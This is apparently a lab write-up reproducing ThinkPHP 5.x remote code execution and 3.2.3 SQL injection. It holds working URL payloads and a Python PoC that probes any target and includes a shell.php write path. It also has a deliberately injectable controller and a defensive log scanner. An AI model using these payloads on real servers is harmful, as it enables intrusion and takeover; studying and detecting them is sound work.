ThinkPHP 5.0.x environment setup
Just unzip the source and point the browser at the public directory, e.g. http://127.0.0.1/cms/thinkphp/public
ThinkPHP 5.0.x remote code execution
ThinkPHP 5.1.x is set up the same way as 5.0.x.
Payload:
http://127.0.0.1/cms/tp5.1/public/index.php?s=index/\think\request/input?data[]=phpinfo()&filter=assert
http://127.0.0.1/cms/tp5.1/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
Python3 PoC:
#coding:utf-8
import requests

headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}

def poc(target):
    # Request paths to try; raw strings keep the backslashes of the namespaced routes intact
    poc = [r"/index.php?s=index/\think\request/input?data[]=phpinfo()&filter=assert",
           r"/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
           r"/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>"]
    try:
        for i in poc:
            url = target + str(i)
            html = requests.get(url, headers=headers)
            # A phpinfo() page in the response means the request was executed by the framework
            if "<title>phpinfo()</title>" in html.text:
                print("目标存在漏洞:" + url)
    except requests.RequestException:
        pass

if __name__ == "__main__":
    target = input("请输入目标url:")
    poc(target)
ThinkPHP 3.2.3 environment setup
Edit the Application\Common\Conf\config.php configuration file and add the database connection settings.
For some reason declaring the charset here raised an error; after commenting it out everything worked.
<?php
return array(
    //'option name' => 'option value'
    'DB_TYPE'         => 'mysql',
    'DB_HOST'         => 'localhost',
    'DB_NAME'         => 'tp',
    'DB_USER'         => 'root',
    'DB_PWD'          => 'root',
    'DB_PORT'         => '3306',
    'DB_FIELDS_CACHE' => true,
    // 'utf-8' is not a valid MySQL charset name (MySQL calls it 'utf8'), which is why this line errors
    //'DB_CHARSET'    => 'utf-8',
);
?>
Then add the following code to Application\Home\Controller\IndexController.class.php:
public function test()
{
    // I('id') returns the request parameter in whatever shape it arrives, so id[where]=1 comes in as an array, not a scalar
    $id = I('id');
    // find() treats an array argument as query options, so the user-controlled array reaches the query builder
    $res = M('user')->find($id);
    //$res = M('user')->delete($id);
    //$res = M('user')->select($id);
}
Injection point (my coding skills are limited, so I cannot analyse the root cause of this vulnerability for now):
http://127.0.0.1/cms/thinkphp3.2.1/index.php?m=Home&c=Index&a=test&id[where]=1
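From the defender's side, the two request families above (the TP5.x namespaced route with a PHP callable in the query string, and the TP3.2 action receiving id[where]=1 instead of a plain id) are easy to pick out of access logs. The following log scanner is an added example written for this page, not the author's PoC; it assumes Common Log Format lines, and the sample lines are constructed inline.

```python
import re
from urllib.parse import unquote, urlparse, parse_qs

# Constructed Common Log Format lines: two shaped like the requests above, two benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2019:10:15:01 +0000] "GET /public/index.php?s=index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2019:10:15:07 +0000] "GET /index.php?m=Home&c=Index&a=test&id[where]=1 HTTP/1.1" 200 80',
    '10.0.0.9 - - [12/Mar/2019:10:16:00 +0000] "GET /index.php?m=Home&c=Index&a=test&id=42 HTTP/1.1" 200 80',
    '10.0.0.9 - - [12/Mar/2019:10:16:03 +0000] "GET /public/index.php?s=index/index/index HTTP/1.1" 200 1024',
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# PHP callables that never belong in a query string as the value of function=, filter= or vars[...]
DANGEROUS_CALLABLES = {"assert", "call_user_func_array", "call_user_func", "system", "eval"}
# A parameter the controller expects as a scalar arriving as an array with a named key, e.g. id[where]
NAMED_ARRAY_KEY = re.compile(r"^[A-Za-z_]\w*\[[A-Za-z_]\w*\]$")

def classify_request(uri):
    """Return finding labels for one request URI (empty list when nothing matches)."""
    decoded = unquote(uri)  # %5C -> "\" so the route reads as the framework will see it
    params = parse_qs(urlparse(decoded).query, keep_blank_values=True)
    findings = []
    # TP5.x: the 's' route parameter names a namespaced class instead of module/controller/action
    if "\\" in params.get("s", [""])[0]:
        findings.append("tp5_namespaced_route")
    # TP5.x: a PHP callable handed to the framework where it will be invoked
    for key, values in params.items():
        if key in ("function", "filter") or key.startswith("vars["):
            if any(v.lower() in DANGEROUS_CALLABLES for v in values):
                findings.append("tp5_callable_in_query")
                break
    # TP3.2: array-shaped value where the action expects a plain id
    if any(NAMED_ARRAY_KEY.match(k) for k in params):
        findings.append("tp3_named_array_parameter")
    return findings

def scan_log(lines):
    """Return (line_no, uri, findings) for each request that triggers at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m and (findings := classify_request(m.group("uri"))):
            hits.append((n, m.group("uri"), findings))
    return hits

if __name__ == "__main__":
    for n, uri, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {findings} <- {uri}")
```

The same classify_request() can be dropped into a WAF or reverse-proxy rule: a backslash inside the s= route, or a callable name in function=/filter=/vars[...], has no legitimate use in a ThinkPHP URL.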